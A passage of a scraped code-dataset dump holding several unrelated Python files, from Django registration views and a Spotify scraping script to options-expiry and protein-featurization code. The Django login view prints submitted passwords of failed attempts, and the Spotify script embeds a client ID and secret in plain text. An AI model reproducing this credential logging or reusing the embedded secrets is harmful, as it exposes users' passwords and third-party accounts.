isinstance(account.positions[0].asset, Option) else account.positions[0].asset ).quote_date\n\n # get a list of all the options that are expired\n expired = [_ for _ in account.positions\n if isinstance(_.asset, Option)\n and arrow.get(_.asset.expiration_date).format('YYYY-MM-DD') < arrow.get(current_date).format('YYYY-MM-DD')]\n\n # no expirations, bail\n if len(expired) == 0:\n return\n\n # get a unique list of underlyings\n underlyings = list(set([_.asset.underlying.symbol for _ in expired]))\n\n # iterate through them\n for underlying in underlyings:\n\n # get a current quote\n underlying_quote = quote_adapter.get_quote(underlying)\n\n # get the positions in or of this underlying\n positions_in_underlying = [_ for _ in account.positions if (isinstance(_.asset, Option) and _.asset.underlying == underlying) or (_.asset == underlying)]\n\n # make a list of the positions of expiring options in this underlying\n expired_positions = [_ for _ in account.positions\n if isinstance(_.asset, Option)\n and arrow.get(_.asset.expiration_date).format('YYYY-MM-DD') <\n arrow.get(current_date).format('YYYY-MM-DD')\n ]\n\n # record the amount of long and short equity we have open to work with\n long_equity = sum([_.quantity for _ in positions_in_underlying\n if not isinstance(_.asset, Option)\n and _.quantity > 0\n ])\n short_equity = sum([_.quantity for _ in positions_in_underlying\n if not isinstance(_.asset, Option)\n and _.quantity < 0\n ])\n\n # start entering orders for the expired options\n for position in expired_positions:\n\n # figure out if the option is ITM\n is_itm = position.asset.get_intrinsic_value(underlying_price=underlying_quote.price) > 0\n\n if not is_itm:\n # if the option is not in the money, it expired worthless, force it to dissapear\n pass\n else:\n # the option is in the money, so we need to handle it\n\n if position.asset.option_type == 'call' and position.quantity > 0:\n # long calls expire by buying the stock at the strike price and\n # adding the option cost basis to the stock cost basis\n account.cash -= position.asset.strike * position.quantity * 100\n account.positions.append(Position(asset=underlying,\n quantity=abs(position.quantity) * 100,\n cost_basis=position.asset.strike + abs(position.cost_basis)))\n\n elif position.asset.option_type == 'call' and position.quantity < 0:\n # short calls expire by being forced to surrender the stock and get the strike price\n # we'll handle this by putting in a fixed price sell-to-close order for the underlying\n # if for some reason the order doesn't fill (like there is no stock available)\n\n # two things can happen here. Either you have enough shares to surrender and so you surrender them\n # or you don't have enough shares and you're forced to buy them to surrender\n\n # iterate through each quantity to make the code simpler\n for x in range(abs(position.quantity)):\n if long_equity > 100:\n # there is stock available to surrender\n # drain 100 shares\n drain_asset(positions=account.positions, asset=position.asset.underlying, quantity=-100)\n long_equity -= 100\n else:\n # there is not enough stock, so subtract enough cash to buy the shares\n account.cash -= underlying_quote.price * 100\n # then sell them back at the strike\n account.cash += position.asset.strike * 100\n\n elif position.asset.option_type == 'put' and position.quantity > 0:\n # long puts expire by you gaining short shares and cash at the strike\n # adding the option cost basis to the stock cost basis\n account.cash += position.asset.strike * abs(position.quantity) * 100\n account.positions.append(Position(asset=underlying,\n quantity= -1 * abs(position.quantity) * 100,\n cost_basis=position.asset.strike - abs(position.cost_basis)))\n\n elif position.asset.option_type == 'put' and position.quantity < 0:\n # short puts expire by you being forced to liquidate a short but you shares strike price in cash\n # iterate through each quantity to make the code simpler\n\n for x in range(abs(position.quantity)):\n if short_equity < -100:\n # we have short equity to give up\n # drain 100 shares\n drain_asset(positions=account.positions, asset=position.asset.underlying, quantity=100)\n account.cash -= underlying_quote.price * 100\n short_equity += 100\n else:\n # there is not enough short available, so you get to buy some shares, so take the cash\n account.cash -= underlying_quote.price * 100\n # and give it back\n account.cash += position.asset.strike * 100\n\n\n position.quantity = 0\n\n account.positions = [_ for _ in account.positions if _.quantity != 0]\n return account","repo_name":"philipodonnell/paperbroker","sub_path":"paperbroker/logic/close_expired_options.py","file_name":"close_expired_options.py","file_ext":"py","file_size_in_byte":8469,"program_lang":"python","lang":"en","doc_type":"code","stars":235,"dataset":"github-code","pt":"48"} +{"seq_id":"38106323268","text":"import traceback\n\nfrom django.shortcuts import render\n\n# Create your views here.\nimport random\nfrom django.contrib.auth import logout, authenticate, login\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.db import connection\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.shortcuts import render\nimport json\nfrom datetime import datetime\nfrom django.urls import reverse\nfrom .forms import RegisterForm\nfrom EventRegistrationHEApp.models import ErRegisteredUsers\n\n\n@login_required\ndef user_logout(request):\n logout(request)\n return HttpResponseRedirect(reverse('login'))\n\n\ndef user_login(request):\n if request.method == \"POST\":\n username = request.POST.get('username')\n password = request.POST.get('password')\n\n user = authenticate(username=username, password=password)\n\n if user:\n if user.is_active:\n login(request, user)\n return HttpResponseRedirect(reverse('dashboard'))\n else:\n return HttpResponse(\"Account not Active!\")\n else:\n print(\"Someone tried to login and failed!\")\n print(\"Username: {} and password {}\".format(username, password))\n return HttpResponse(\"Invalid Login details supplied\")\n\n else:\n return render(request, 'EventRegistrationHEApp/login.html')\n\n\n@login_required\ndef dashboard(request):\n countself = ErRegisteredUsers.objects.filter(registration_type='Self').count()\n Group = ErRegisteredUsers.objects.filter(registration_type='Group').count()\n Corporate = ErRegisteredUsers.objects.filter(registration_type='Corporate').count()\n Others = ErRegisteredUsers.objects.filter(registration_type='Others').count()\n results = [countself, Group, Corporate, Others]\n return render(request, 'EventRegistrationHEApp/dashboard.html', context={'a':results})\n\n\ndef home(request):\n return render(request, 'EventRegistrationHEApp/home.html')\n\n\n@login_required\ndef ER_Registered_User(request):\n allusers = ErRegisteredUsers.objects.all().order_by('user_id')\n page = request.GET.get('page', 1)\n paginator = Paginator(allusers, 12)\n try:\n users = paginator.page(page)\n except PageNotAnInteger:\n users = paginator.page(1)\n except EmptyPage:\n users = paginator.page(paginator.num_pages)\n return render(request, 'EventRegistrationHEApp/RegisteredUsers.html', context={'users': users})\n\n\n@login_required\ndef ER_Registered_User_details(request, value):\n if request.method == \"GET\":\n try:\n value = str(value)\n userd = ErRegisteredUsers.objects.get(registration_id=value)\n except ErRegisteredUsers.DoesNotExist:\n userd = None\n return render(request, 'EventRegistrationHEApp/userdetails.html', context={'u': userd})\n\n\ndef thankyou(request):\n cursor = connection.cursor()\n cursor.execute('SELECT \"Registration_ID\" FROM \"EventRegistrationHEApp_erregisteredusers\" ORDER BY \"User_ID\" DESC LIMIT 1')\n regid = cursor.fetchone()\n return render(request, 'EventRegistrationHEApp/thankyou.html', context={'ID': regid[0]})\n\n\ndef registerdata(request):\n if request.method == \"POST\":\n register_form = RegisterForm(data=request.POST)\n print(register_form.is_valid())\n if register_form.is_valid():\n try:\n ruser = register_form.save(commit=False)\n cursor = connection.cursor()\n cursor.execute('SELECT MAX(\"User_ID\")+1 from \"EventRegistrationHEApp_erregisteredusers\"')\n x = cursor.fetchone()\n if x[0] == 'NULL' or x[0] == 'null' or x[0] == None:\n ruser.user_id = 1\n else:\n ruser.user_id = x[0]\n ruser.registration_id = 'A' + str(random.randrange(1000, 99999999))\n ruser.registration_date = datetime.now()\n if 'id_cards' in request.FILES:\n ruser.id_cards = request.FILES['id_cards']\n ruser.save()\n return HttpResponseRedirect(reverse('thankyou'))\n except Exception as e:\n print(e)\n traceback.format_exc()\n else:\n print(register_form.errors)\n else:\n register_form = RegisterForm()\n return render(request, 'EventRegistrationHEApp/registerform.html', {'register_form': register_form})","repo_name":"manu143manoj/Event-Registration","sub_path":"EventRegistrationHEApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35990121732","text":"import os.path\r\n\r\nimport pygame as pg\r\nimport random\r\n\r\n\r\n# define colors, colors work in a (RGB) format.\r\nWHITE = (255, 255, 255)\r\nBLACK = (0, 0, 0)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0, 0, 255)\r\nYELLOW = (255,255,0)\r\nTEAL = (0,255,255)\r\nPINK = (255,0,255)\r\nORANGE = (255,127,0)\r\nDARK_GRAY = (64,64,64)\r\nLIGHT_GRAY = (192,192,192)\r\nGRAY_BLUE = (92,192,194)\r\n\r\ncolors = (WHITE,BLUE,BLACK,RED,GREEN,YELLOW,TEAL,PINK,ORANGE)\r\n\r\n\r\n\r\n#Game Title\r\nTITLE = \"CHANGE ME THIS IS WRONG!\"\r\n\r\n\r\n\r\n# Window Settings\r\nWIDTH = 500\r\nHEIGHT = 500\r\nDEFAULT_COLOR = BLACK\r\nTILE_SIZEX = WIDTH/10\r\nTILE_SIZEY = HEIGHT/10\r\n\r\n\r\n# camera settings\r\nfps = 60\r\n\r\n# file locations\r\n#gets location of file on computer\r\ngame_folder = os.path.dirname(__file__)\r\ngame_folder = game_folder.replace(\"\\scripts\",\"\")\r\nsprites_folder = os.path.join(game_folder,\"sprites\")\r\nplayerSprites = os.path.join(sprites_folder,\"playerSprites\")\r\nenemySprites = os.path.join(sprites_folder,\"enemySprites\")\r\n\r\n\r\n\r\n# player Settings\r\nsolidbounds = True\r\nbouncy = False\r\nspawn_invincibility = True\r\nplayer_img = os.path.join(playerSprites,\"roboBoyStill.png\")\r\nplayer_img_move = os.path.join(playerSprites,\"roboBoyMove.png\")\r\nplayer_img_down = os.path.join(playerSprites,\"roboBoyDown.png\")\r\nplayer_img_up = os.path.join(playerSprites,\"roboBoyUp.png\")\r\n\r\n\r\n\r\n# Enemy Settings\r\n\r\nenemy_img = os.path.join(enemySprites,\"enemyStill.png\")\r\nenemyCreep_img = os.path.join(enemySprites,\"enemyCreepy.png\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Hovercraft1774/PygameTemplate","sub_path":"PygameTemplatev2/scripts/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42726158865","text":"import spotipy\nimport json\nimport h5py\nfrom spotipy.oauth2 import SpotifyClientCredentials\nimport sqlite3\nfrom copy import deepcopy\nfrom datetime import datetime\n\n\nconn = sqlite3.connect('/users/bclark66/sp_data_for_tempo_test.db')\ncur = conn.cursor()\n\nclient_credentials_manager = SpotifyClientCredentials(client_id=\"e90c5ed628d443819c60714f29cc8186\",client_secret=\"e7632ab680d44aa3ab55434315075309\")\nsp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\nregional_words = {'chinese', 'taiwan', 'traditional', 'dutch', 'euro', 'israeli', 'swedish', 'celtic',\n'italian', 'french', 'argentine', 'latin', 'spanish', 'czech', 'luxembourgian', 'brazilian', 'hungarian',\n'arab', 'german', 'danish', 'icelandic', 'glam', 'norwegian', 'turkish', 'irish', 'colombian',\n'iraqi', 'thai', 'dominican', 'indian', 'persian', 'lebanese', 'polish', 'chilean', 'sertanejo',\n'swiss', 'belarusian', 'bolivian', 'italo', 'garifuna', 'manila', 'vietnamese', 'indo', 'indonesian',\n'singaporean', 'greek', 'pakistani', 'breton', 'syrian', 'mexican', 'finnish', 'pagan', 'viking',\n'quebec', 'russian', 'romanian', 'wellington', 'cumbia', 'baile', 'latvian', 'serbian', 'slovak',\n'regional', 'suomi', 'japanese', 'croatian', 'lithuanian', 'euskal', 'perth', 'estonian', 'bahamian',\n'guinean', 'mande', 'belgian', 'yugoslav', 'portuguese', 'baltic', 'african', 'armenian', 'kosovan',\n'jewish', 'medieval', 'rune', 'brit', 'slovenian', 'sudanese', 'malian', 'ilocano', 'gothenburg',\n'pinoy', 'anime', 'korean', 'austrian', 'welsh', 'beninese', 'tunisian', 'slavic', 'algerian',\n'bulgarian', 'malaysian', 'puerto', 'rican', 'concepcion', 'maltese', 'bristol', 'galician', 'ecuadorian',\n'cook', 'islands', 'polynesian', 'peruvian', 'catalan', 'montreal', 'venezuelan', 'basque', 'panamanian',\n'nordic', 'rome', 'punjabi', 'paraguayan', 'albanian', 'national'}\n\nclassical_words = {'baroque', 'chamber','classical', 'early music','opera', 'orchestra,romantic'}\njazz_words = {'bebop', 'big band', 'bop','fusion', 'jazz','swing','boogie','Dixieland','jive'}\nrock_words = {'funk','blues','country', 'disco', 'emo', 'folk', 'grunge', 'indie', 'metal','punk', 'reggae', 'rock', 'screamo'}\nhip_hop_words = {'electro', 'electronica','hip hop', 'house', 'industrial','rap', 'techno', 'trance', 'trap'}\n\ndef flatten_dict(d, result={}, prv_keys=[]):\n for k, v in d.items():\n #print(\"k \",k)\n if isinstance(v, dict):\n flatten_dict(v, result, prv_keys + [k])\n else:\n result['.'.join(prv_keys + [k])] = v\n\n return result\n\ndef get_artist_id(yr,c,jz,r,h,letter):\n \n query = letter + ' year:' + yr\n results = sp.search(query,type='album',limit=50)\n flat_result = flatten_dict(results)\n #print(flat_result.keys())\n #print(flat_result[\"tracks.total\"],\" \",flat_result[\"tracks.next\"],\" \",flat_result[\"tracks.offset\"])\n \n total = flat_result[\"albums.total\"]\n now = datetime.now()\n\n current_time = now.strftime(\"%H:%M:%S\")\n \n print(\"starting year: \",yr,current_time,total)\n \n current = 0\n track_count = 0\n classical_tracks_count_needed = c\n jazz_tracks_count_needed = jz\n rock_tracks_count_needed = r\n hip_hop_tracks_count_needed = h\n classical_tracks_count = 0\n jazz_tracks_count = 0\n rock_tracks_count = 0\n hip_hop_tracks_count = 0\n\n while current < total:\n try:\n results = sp.search(query,type='album',limit=50,offset=current)\n except Exception as toomany:\n print(\"# of albums \",current,\" # of tracks \",track_count,toomany)\n #yr,new_current,new_classical_tracks_count,new_jazz_tracks_count,new_rock_tracks_count,new_hip_hop_tracks_count = get_artist_id(yr,c,jz,r,h)\n # classical_tracks_count += new_classical_tracks_count\n # jazz_tracks_count += new_jazz_tracks_count\n # rock_tracks_count += new_rock_tracks_count\n # hip_hop_tracks_count += new_hip_hop_tracks_count\n break\n\n flat_result = flatten_dict(results)\n x = 0\n \n\n for item in flat_result[\"albums.items\"]:\n if 'Live' in item['name'] or 'live' in item['name']:\n continue\n ts = []\n #print(\"album\",item['id'])\n ts.append(item[\"id\"])\n ts.append(item[\"name\"])\n ts.append(item[\"release_date\"])\n ts.append(item[\"release_date_precision\"])\n ts.append(item[\"total_tracks\"])\n ts.append(item[\"type\"])\n ts.append(' ')\n ts.append(' ')\n ts.append(item['href'])\n #trks.append(ts[i])\n \n #print('ts ',ts[i])\n trks = [[0] * 2 for x in range(item['total_tracks'])]\n try:\n tracks_result = sp.album_tracks(ts[0])\n except Exception as notrack:\n print(\"no tracks\",notrack)\n tracks_result = {'items':[]}\n \n track_count = 0\n for track in tracks_result[\"items\"]:\n if 'Live' in track['name'] or 'live' in track['name']:\n continue \n trks[track_count][0] = item['id']\n trks[track_count][1] = track['id']\n track_count += 1\n if track_count > 1:\n break\n\n\n ta = [[0] * 2 for i in range(len(item[\"artists\"]))]\n artists = [[0] * 7 for x in range(len(item['artists']))]\n j = 0\n for row in item[\"artists\"]:\n ta[j][0] = item[\"id\"]\n ta[j][1] = row[\"id\"]\n try:\n artist_result = sp.artist(row['uri'])\n except Exception as noartist:\n print(\"no artist\",noartist)\n break\n #genres = set(artist_result[\"genres\"])\n genre_list = []\n for term in artist_result[\"genres\"]:\n if term == 'hip hop':\n genre_list.append(term)\n else:\n term_list = term.split(\" \")\n for word in term_list:\n genre_list.append(word)\n genres = set(genre_list)\n genre_string = '::'\n genre_strizng = genre_string.join(genre_list)\n artists[j][0] = row[\"id\"]\n artists[j][1] = genre_string\n artists[j][2] = artist_result[\"href\"]\n artists[j][3] = artist_result['name']\n artists[j][4] = artist_result['popularity']\n artists[j][5] = artist_result['uri']\n artists[j][6] = artist_result['followers']['total']\n \n \n contains_regional_word = list(genres & regional_words)\n genre_count = 0\n if len(contains_regional_word) > 0:\n print(\"ctw\",genres)\n continue\n contains_classical_word = list(genres & classical_words)\n contains_jazz_word = list(genres & jazz_words)\n contains_rock_word = list(genres & rock_words)\n contains_hip_hop_word = list (genres & hip_hop_words) \n print(\"counts\",classical_tracks_count,jazz_tracks_count,rock_tracks_count,hip_hop_tracks_count)\n\n if len(contains_classical_word) > 0 and classical_tracks_count < classical_tracks_count_needed:\n genre_count += 1\n if len(contains_jazz_word) > 0 and jazz_tracks_count < jazz_tracks_count_needed:\n genre_count += 1\n if len(contains_rock_word) > 0 and rock_tracks_count < rock_tracks_count_needed:\n genre_count +=1\n if len(contains_hip_hop_word) > 0 and hip_hop_tracks_count < hip_hop_tracks_count_needed:\n genre_count +=1\n \n if genre_count == 1:\n try:\n print(\"about to insert album\",ts[0])\n cur.execute('insert into album values (?,?,?,?,?,?,?,?,?)',ts)\n conn.commit()\n #print(\"about to insert album_artist\",ta[j])\n cur.execute('insert into album_artist values (?,?)',ta[j])\n #print(\"about to insert album_track\",trks)\n cur.executemany('insert into album_track VALUES (?,?)', trks)\n #print(\"about to insert artists\",artists[j]) \n cur.execute('insert into artist values(?,?,?,?,?,?,?)',artists[j])\n except Exception as badinsert:\n pass\n #print(\"bad insert\",badinsert,ta[j][1])\n if len(contains_classical_word) > 0:\n classical_tracks_count += track_count\n elif len(contains_jazz_word) > 0:\n jazz_tracks_count += track_count\n elif len(contains_rock_word) > 0:\n rock_tracks_count += track_count\n elif len(contains_hip_hop_word) > 0:\n hip_hop_tracks_count += track_count\n\n \n break \n else:\n print(\"skipped genres\",genres,genre_count,) \n j += 1\n \n\n # # c.executemany('insert into track_artist VALUES (?,?,?)', ta)\n # i += 1 \n offset = flat_result[\"albums.offset\"]\n #c.executemany('INSERT INTO track_search VALUES (?,?,?)', ts)\n \n \n #conn.commit()\n current += 50\n #print(current)\n print(\"year\",yr,\"# of albums \",current,\" # of tracks \",classical_tracks_count,jazz_tracks_count,rock_tracks_count,hip_hop_tracks_count)\n return(yr,current,classical_tracks_count,jazz_tracks_count,rock_tracks_count,hip_hop_tracks_count)\ni = 0\n#for row in c2.execute('SELECT artist_name,count(*) FROM songs group by artist_id order by 2 desc'):\n#for row in c2.execute('select tan.track_id, count(*) from track_search tan left outer join track_analysis ta on ta.track_id = tan.track_id and ta.track_id is null group by tan.track_id'):\n # if i > 60:\n # break\n # #print(row)\n # artist = row[0]\n # get_artist_id(artist)\n # i += 1\njazz_needs = [[1974,7],[1978,9],[1979,15],[1980,39],[1981,23],[1982,13],[1983,17],[1984,20],[1985,2]]\nyr = \"1980\"\nfor needed_year in range(1978,1979):\n for letter in ('a','e','i','o','u','y'):\n # nbr_needed = jazz_needs[needed_year][1]\n # yr = jazz_needs[needed_year][0]\n get_artist_id(str(needed_year),100,100,100,100,letter)\n# for row in c.execute('select distinct track_id from track_artist where track_id not in (select distinct track_id from track_analysis)'):\n# trks.append(row[0])\n#print(trks)\n\n","repo_name":"Computational-Cognitive-Musicology-Lab/tempo_stability","sub_path":"code/get_tracks_for_missing_years.py","file_name":"get_tracks_for_missing_years.py","file_ext":"py","file_size_in_byte":10907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72677709585","text":"from pymemcache.client import base\nfrom pymemcache import fallback\n\n\ndef perform_query():\n return 13\n\n\n# set ignore_exc=True to shut down old cache before removing its usage from program\nold_cache = base.Client(('localhost', 32000), ignore_exc=True)\nnew_cache = base.Client(('localhost', 32001))\n\nclient = fallback.FallbackClient((new_cache, old_cache))\n\nresult = client.get('KEY')\n\nif result is None:\n result = perform_query()\n client.set('KEY', result)\n\n\nprint(result)","repo_name":"tmendonca28/Python-Memcached","sub_path":"cold_cache_fallback.py","file_name":"cold_cache_fallback.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24808311046","text":"# Rock Paper Scissors\r\n# A simple rock paper scissors game with 2 players\r\n\r\nchoice = [\"p\", \"r\", \"s\"]\r\nwhile True:\r\n p1 = input(\"Player 1: Rock (r) Paper (p) Scissors (s)\\n = \").lower()\r\n p2 = input(\"Player 2: Rock (r) Paper (p) Scissors (s)\\n = \").lower()\r\n if p1 == p2:\r\n \"Draw!\"\r\n if choice.index(p1) == (choice.index(p2) + 1) % 3:\r\n print(\"Player 2 Wins!\")\r\n elif choice.index(p2) == (choice.index(p1) + 1) % 3:\r\n print(\"Player 1 Wins!\")\r\n\r\n x = input(\"Play another round? (y/n)\\n= \")\r\n if x == \"n\":\r\n break\r\n","repo_name":"andrewzakhartchouk/python_practice","sub_path":"rockpaperscissors/rockpaperscissors.py","file_name":"rockpaperscissors.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20982633251","text":"# Реализовать функцию, принимающую несколько параметров, описывающих данные\n# пользователя: имя, фамилия, год рождения, город проживания, email, телефон.\n# Функция должна принимать параметры как именованные аргументы. Реализовать\n# вывод данных о пользователе одной строкой.\n\ndef print_user_info(**fields):\n \"\"\"\n Выводит данные о пользователе в одну строку\n :param fields: данные о пользователе\n \"\"\"\n output = ''\n for field, value in fields.items():\n output = f'{output}{field}: {value} '\n print(output)\n\n\ndef user_input(func):\n try:\n return func(input(prompt))\n except ValueError:\n print('Некорректный ввод! Введите корректные данные')\n\n\nif __name__ == '__main__':\n user = {'имя': str, 'фамилия': str, 'год рождения': int,\n 'город проживания': str, 'email': str, 'телефон': str}\n\n print('Введите данные о пользователе: ')\n for field, value in user.items():\n prompt = f'{field}: '\n success = False\n while not success:\n user[field] = user_input(value)\n success = True\n\n print_user_info(name=user['имя'], surname=user['фамилия'],\n birth_year=user['год рождения'],\n city=user['город проживания'], email=user['email'],\n phone_number=user['телефон'])\n","repo_name":"Nikkurer/gb_py_basics","sub_path":"Lesson_3/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3578841661","text":"\"\"\"\r\nFeaturization code\r\n\"\"\"\r\n\r\nimport os, sys\r\nimport logging\r\nimport tempfile\r\nfrom functools import cache, lru_cache\r\nimport itertools\r\nimport collections\r\nfrom typing import *\r\nfrom functools import cached_property\r\nfrom math import floor\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nfrom transformers import BertTokenizer\r\n\r\nimport muscle\r\nimport utils\r\n\r\n#\r\nAA_TRIPLET_TO_SINGLE = {\r\n \"ARG\": \"R\",\r\n \"HIS\": \"H\",\r\n \"LYS\": \"K\",\r\n \"ASP\": \"D\",\r\n \"GLU\": \"E\",\r\n \"SER\": \"S\",\r\n \"THR\": \"T\",\r\n \"ASN\": \"N\",\r\n \"GLN\": \"Q\",\r\n \"CYS\": \"C\",\r\n \"SEC\": \"U\",\r\n \"GLY\": \"G\",\r\n \"PRO\": \"P\",\r\n \"ALA\": \"A\",\r\n \"VAL\": \"V\",\r\n \"ILE\": \"I\",\r\n \"LEU\": \"L\",\r\n \"MET\": \"M\",\r\n \"PHE\": \"F\",\r\n \"TYR\": \"Y\",\r\n \"TRP\": \"W\",\r\n}\r\nAA_SINGLE_TO_TRIPLET = {v: k for k, v in AA_TRIPLET_TO_SINGLE.items()}\r\n\r\n# 21 amino acids\r\nAMINO_ACIDS = \"RHKDESTNQCUGPAVILMFYW\"\r\nassert len(AMINO_ACIDS) == 21\r\nassert all([x == y for x, y in zip(AMINO_ACIDS, AA_TRIPLET_TO_SINGLE.values())])\r\nAMINO_ACIDS_TO_IDX = {aa: i for i, aa in enumerate(AMINO_ACIDS)}\r\n\r\n# Pad with $ character\r\nPAD = \"$\"\r\nMASK = \".\"\r\nUNK = \"?\"\r\nSEP = \"|\"\r\nCLS = \"*\"\r\nAMINO_ACIDS_WITH_ALL_ADDITIONAL = AMINO_ACIDS + PAD + MASK + UNK + SEP + CLS\r\nAMINO_ACIDS_WITH_ALL_ADDITIONAL_TO_IDX = {\r\n aa: i for i, aa in enumerate(AMINO_ACIDS_WITH_ALL_ADDITIONAL)\r\n}\r\n\r\n\r\nclass SequenceMasker:\r\n \"\"\"Mask one position in each sequence for evaluation (NOT FOR TRAINING)\"\"\"\r\n\r\n def __init__(self, seq: Union[str, List[str]], seed: int = 4581):\r\n self._seed = seed\r\n self.rng = np.random.default_rng(seed=seed)\r\n self.unmasked = [seq] if isinstance(seq, str) else seq\r\n self._masked_indices = []\r\n self.unmasked_msa = muscle.run_muscle(self.unmasked)\r\n\r\n @cached_property\r\n def masked(self) -> List[str]:\r\n retval = []\r\n for unmasked in self.unmasked:\r\n aa = list(unmasked)\r\n mask_idx = self.rng.integers(0, len(aa))\r\n assert 0 <= mask_idx < len(aa)\r\n self._masked_indices.append(mask_idx)\r\n aa[mask_idx] = MASK\r\n retval.append(\" \".join(aa)) # Space is necessary for tokenizer\r\n assert len(self._masked_indices) == len(self)\r\n return retval\r\n\r\n @cached_property\r\n def masked_truth(self) -> List[str]:\r\n \"\"\"Return the masked amino acids\"\"\"\r\n _ = self.masked # Ensure that this has been generated\r\n return [\r\n self.unmasked[i][mask_idx]\r\n for i, mask_idx in enumerate(self._masked_indices)\r\n ]\r\n\r\n def __len__(self) -> int:\r\n return len(self.unmasked)\r\n\r\n def get_naive_predictions(\r\n self,\r\n k: int,\r\n method: Literal[\r\n \"most_common\", \"random\", \"most_common_positional\"\r\n ] = \"most_common\",\r\n ) -> List[List[str]]:\r\n \"\"\"\r\n Return naive predictions for each of the masked sequences\r\n Each entry in the list is a list of the top k predictions\r\n \"\"\"\r\n if method == \"most_common\":\r\n cnt = collections.Counter()\r\n for seq in self.unmasked:\r\n cnt.update(seq)\r\n top_k = [k for k, v in cnt.most_common(k)]\r\n return [top_k] * len(self)\r\n elif method == \"most_common_positional\":\r\n # Create a matrix where each row corresponds to a position\r\n max_len = len(self.unmasked_msa[0])\r\n seqs_matrix = np.stack([np.array(list(s)) for s in self.unmasked_msa]).T\r\n assert seqs_matrix.shape == (max_len, len(self))\r\n\r\n # Per-position predictions\r\n per_pos_most_common = []\r\n for i in range(max_len):\r\n # Excludes padding bases\r\n cnt = collections.Counter(\r\n [aa for aa in seqs_matrix[i] if aa in AMINO_ACIDS]\r\n )\r\n per_pos_most_common.append([aa for aa, _n, in cnt.most_common(k)])\r\n #\r\n retval = [per_pos_most_common[i] for i in self._masked_indices]\r\n return retval\r\n elif method == \"random\":\r\n baseline_naive_rng = np.random.default_rng(seed=self._seed)\r\n retval = []\r\n for _i in range(len(self)):\r\n idx = [\r\n baseline_naive_rng.integers(0, len(AMINO_ACIDS)) for _j in range(k)\r\n ]\r\n retval.append([AMINO_ACIDS[i] for i in idx])\r\n return retval\r\n else:\r\n raise ValueError(f\"Unrecognized method: {method}\")\r\n\r\n\r\ndef adheres_to_vocab(s: str, vocab: str = AMINO_ACIDS) -> bool:\r\n \"\"\"\r\n Returns whether a given string contains only characters from vocab\r\n >>> adheres_to_vocab(\"RKDES\")\r\n True\r\n >>> adheres_to_vocab(AMINO_ACIDS + AMINO_ACIDS)\r\n True\r\n \"\"\"\r\n return set(s).issubset(set(vocab))\r\n\r\n\r\ndef write_vocab(vocab: Iterable[str], fname: str) -> str:\r\n \"\"\"\r\n Write the vocabulary to the fname, one entry per line\r\n Mostly for compatibility with transformer BertTokenizer\r\n \"\"\"\r\n with open(fname, \"w\") as sink:\r\n for v in vocab:\r\n sink.write(v + \"\\n\")\r\n return fname\r\n\r\n\r\ndef get_aa_bert_tokenizer(\r\n max_len: int = 64, d=AMINO_ACIDS_WITH_ALL_ADDITIONAL_TO_IDX\r\n) -> BertTokenizer:\r\n \"\"\"\r\n Tokenizer for amino acid sequences. Not *exactly* the same as BertTokenizer\r\n but mimics its behavior, encoding start with CLS and ending with SEP\r\n\r\n >>> get_aa_bert_tokenizer(10).encode(insert_whitespace(\"RKDES\"))\r\n [25, 0, 2, 3, 4, 5, 24]\r\n \"\"\"\r\n with tempfile.TemporaryDirectory() as tempdir:\r\n vocab_fname = write_vocab(d, os.path.join(tempdir, \"vocab.txt\"))\r\n tok = BertTokenizer(\r\n vocab_fname,\r\n do_lower_case=False,\r\n do_basic_tokenize=True,\r\n tokenize_chinese_chars=False,\r\n pad_token=PAD,\r\n mask_token=MASK,\r\n unk_token=UNK,\r\n sep_token=SEP,\r\n cls_token=CLS,\r\n model_max_len=max_len,\r\n padding_side=\"right\",\r\n )\r\n return tok\r\n\r\n\r\ndef get_pretrained_bert_tokenizer(path: str) -> BertTokenizer:\r\n \"\"\"Get the pretrained BERT tokenizer from given path\"\"\"\r\n tok = BertTokenizer.from_pretrained(\r\n path,\r\n do_basic_tokenize=False,\r\n do_lower_case=False,\r\n tokenize_chinese_chars=False,\r\n unk_token=UNK,\r\n sep_token=SEP,\r\n pad_token=PAD,\r\n cls_token=CLS,\r\n mask_token=MASK,\r\n padding_side=\"right\",\r\n )\r\n return tok\r\n\r\n\r\ndef mask_for_training(seq: str, prob: float = 0.15):\r\n \"\"\"\r\n Manually mask for training. Expects 'spaced' input\r\n \"\"\"\r\n aa = np.array(seq.split())\r\n assert len(aa) > 1\r\n target = np.zeros_like(aa, dtype=np.int64) - 100\r\n mask = np.random.random(len(aa)) <= prob\r\n masked_aa = aa[mask]\r\n target[mask] = [AMINO_ACIDS_TO_IDX[a] for a in masked_aa]\r\n aa[mask] = MASK\r\n assert target.shape == aa.shape\r\n return target, \" \".join(aa)\r\n\r\n\r\ndef one_hot(seq: str, alphabet: Optional[str] = AMINO_ACIDS) -> np.ndarray:\r\n \"\"\"\r\n One-hot encode the input string. Since pytorch convolutions expect\r\n input of (batch, channel, length), we return shape (channel, length)\r\n When one hot encoding, we ignore the pad characters, encoding them as\r\n a vector of 0's instead\r\n \"\"\"\r\n if not seq:\r\n assert alphabet\r\n return np.zeros((len(alphabet), 1), dtype=np.float32)\r\n if not alphabet:\r\n alphabet = utils.dedup(seq)\r\n logging.info(f\"No alphabet given, assuming alphabet of: {alphabet}\")\r\n seq_arr = np.array(list(seq))\r\n # This implementation naturally ignores the pad character if not 